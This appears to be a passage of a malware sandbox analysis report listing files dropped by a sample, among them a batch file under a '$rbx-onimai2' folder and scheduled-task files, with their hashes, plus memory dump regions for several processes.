878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4

SHA512
cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c

Download Submit
C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Filesize
7.2MB

MD5
b052451fc18d2a15c1d83312b55d09a3

SHA1
81ed7f80a894ceaca01153920d3b5e73f593d6a5

SHA256
adf4074b727b1f4914e3d1bd154f5d8672d16688960a77d4262e2c620cf7f890

SHA512
9102cea466aa291c2df1a4f2d69d4cfe71ef7c7dd048f17719757ed317e80b192337894d59c04fdb95c9c92fc1b0568f2049960ee927bc66d6b421e089a8a659

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
8abf2d6067c6f3191a015f84aa9b6efe

SHA1
98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

SHA256
ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

SHA512
c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
ceb7caa4e9c4b8d760dbf7e9e5ca44c5

SHA1
a3879621f9493414d497ea6d70fbf17e283d5c08

SHA256
98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

SHA512
1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
1e8e2076314d54dd72e7ee09ff8a52ab

SHA1
5fd0a67671430f66237f483eef39ff599b892272

SHA256
55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

SHA512
5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
memory/596-66-0x00007FF8E06B0000-0x00007FF8E06C0000-memory.dmp

Filesize
64KB

Download
memory/596-65-0x000001C645110000-0x000001C64513A000-memory.dmp

Filesize
168KB

Download
memory/596-54-0x000001C6450E0000-0x000001C645104000-memory.dmp

Filesize
144KB

Download
memory/596-56-0x000001C645110000-0x000001C64513A000-memory.dmp

Filesize
168KB

Download
memory/596-61-0x000001C645110000-0x000001C64513A000-memory.dmp

Filesize
168KB

Download
memory/596-62-0x000001C645110000-0x000001C64513A000-memory.dmp

Filesize
168KB

Download
memory/596-63-0x000001C645110000-0x000001C64513A000-memory.dmp

Filesize
168KB

Download
memory/596-55-0x000001C645110000-0x000001C64513A000-memory.dmp

Filesize
168KB

Download
memory/596-64-0x000001C645110000-0x000001C64513A000-memory.dmp

Filesize
168KB

Download
memory/596-67-0x000001C645110000-0x000001C64513A000-memory.dmp

Filesize
168KB

Download
memory/652-81-0x00007FF8E06B0000-0x00007FF8E06C0000-memory.dmp

Filesize
64KB

Download
memory/652-80-0x0000019E661D0000-0x0000019E661FA000-memory.dmp

Filesize
168KB

Download
memory/652-79-0x0000019E661D0000-0x0000019E661FA000-memory.dmp

Filesize
168KB

Download
memory/652-78-0x0000019E661D0000-0x0000019E661FA000-memory.dmp

Filesize
168KB

Download
memory/652-77-0x0000019E661D0000-0x0000019E661FA000-memory.dmp

Filesize
168KB

Download
memory/652-76-0x0000019E661D0000-0x0000019E661FA000-memory.dmp

Filesize
168KB

Download
memory/652-71-0x0000019E661D0000-0x0000019E661FA000-memory.dmp

Filesize
168KB

Download
memory/652-82-0x0000019E661D0000-0x0000019E661FA000-memory.dmp

Filesize
168KB

Download
memory/924-94-0x00000287431A0000-0x00000287431CA000-memory.dmp

Filesize
168KB

Download
memory/924-96-0x00007FF8E06B0000-0x00007FF8E06C0000-memory.dmp

Filesize
64KB

Download
memory/924-91-0x00000287431A0000-0x00000287431CA000-memory.dmp

Filesize
168KB

Download
memory/924-97-0x00000287431A0000-0x00000287431CA000-memory.dmp

Filesize
168KB

Download
memory/924-92-0x00000287431A0000-0x00000287431CA000-memory.dmp

Filesize
168KB

Download
memory/924-86-0x00000287431A0000-0x00000287431CA000-memory.dmp

Filesize
168KB

Download
memory/924-93-0x00000287431A0000-0x00000287431CA000-memory.dmp

Filesize
168KB

Download
memory/924-95-0x00000287431A0000-0x00000287431CA000-memory.dmp

Filesize
168KB

Download
memory/984-101-0x000002BC39460000-0x000002BC3948A000-memory.dmp

Filesize
168KB

Download
memory/1404-1090-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1404-40-0x0000021BFAA60000-0x0000021BFAEA6000-memory.dmp

Filesize
4.3MB

Download
memory/1404-884-0x00007FF9024F3000-0x00007FF9024F5000-memory.dmp

Filesize
8KB

Download
memory/1404-326-0x0000021BFB0B0000-0x0000021BFB422000-memory.dmp

Filesize
3.4MB

Download
memory/1404-42-0x00007FF920320000-0x00007FF9203DE000-memory.dmp

Filesize
760KB

Download
memory/1404-41-0x00007FF920630000-0x00007FF920825000-memory.dmp

Filesize
2.0MB

Download
memory/1404-0-0x00007FF9024F3000-0x00007FF9024F5000-memory.dmp

Filesize
8KB

Download
memory/1404-1151-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1404-37-0x0000021BD1500000-0x0000021BD153A000-memory.dmp

Filesize
232KB

Download
memory/1404-14-0x0000021BEA6C0000-0x0000021BEA736000-memory.dmp

Filesize
472KB

Download
memory/1404-13-0x0000021BEA250000-0x0000021BEA294000-memory.dmp

Filesize
272KB

Download
memory/1404-12-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1404-11-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1404-10-0x0000021BEA1D0000-0x0000021BEA1F2000-memory.dmp

Filesize
136KB

Download
memory/2804-2159-0x0000026444B30000-0x0000026444BE2000-memory.dmp

Filesize
712KB

Download
memory/2804-1873-0x0000026444110000-0x000002644487E000-memory.dmp

Filesize
7.4MB

Download
memory/2804-3283-0x0000026445CB0000-0x00000264461D8000-memory.dmp

Filesize
5.2MB

Download
memory/2804-2160-0x0000026444DC0000-0x0000026444F82000-memory.dmp

Filesize
1.8MB

Download
memory/2804-2158-0x0000026444A20000-0x0000026444A70000-memory.dmp

Filesize
320KB

Download
memory/4256-49-0x00007FF920630000-0x00007FF920825000-memory.dmp

Filesize
2.0MB

Download
memory/4256-51-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4256-50-0x00007FF920320000-0x00007FF9203DE000-memory.dmp

Filesize
760KB

Download
memory/4256-48-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4256-44-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4256-45-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4256-46-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4256-43-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5296-2596-0x0000022E3A810000-0x0000022E3A81E000-memory.dmp

Filesize
56KB

Download